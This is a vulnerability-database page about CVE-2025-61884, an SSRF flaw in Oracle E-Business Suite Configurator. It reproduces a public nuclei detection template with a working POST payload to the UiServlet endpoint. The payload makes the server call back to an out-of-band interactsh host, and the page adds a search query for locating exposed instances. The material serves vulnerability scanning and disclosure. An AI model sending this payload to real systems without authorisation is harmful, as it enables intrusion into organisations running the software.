CVE-2025-61884: Oracle E-Business Suite - Server-Side Request Forgery

日期: 2025-08-01 | 影响软件: Oracle E-Business Suite | POC: 已公开

漏洞描述

Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.

PoC代码[已公开]

id: CVE-2025-61884

info:
  name: Oracle E-Business Suite - Server-Side Request Forgery
  author: Kazgangap
  severity: high
  description: |
    Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.
  reference:
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884
    - https://nvd.nist.gov/vuln/detail/CVE-2025-61884
    - https://www.oracle.com/security-alerts/alert-cve-2025-61884.html
    - https://arcticwolf.com/resources/blog/cve-2025-61884/
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-61884.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-61884
    cwe-id: CWE-918
    epss-score: 0.34031
    epss-percentile: 0.96774
    cpe: cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="E-Business Suite"
  tags: cve,cve2025,oracle,e-business,kev,vkev

http:
  - raw:
      - |
        POST /OA_HTML/configurator/UiServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
        <initialize>
          <param name="init_was_saved">{{to_lower(rand_text_alpha(6))}}</param>
          <param name="return_url">http://{{interactsh-url}}</param>
          <param name="ui_def_id">0</param>
          <param name="config_effective_usage_id">0</param>
          <param name="ui_type">Applet</param>
        </initialize>

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "valid_configuration","terminate")'
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4b0a00483046022100f477f72eae3c668860bb1644538589e2d563286286c5d2ec125547ea570e5ba4022100ae5b96f64cc06ff7faed8d279d940799f6a258e31f24ecea1152a86d6374daa3:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-61884.yaml

相关漏洞推荐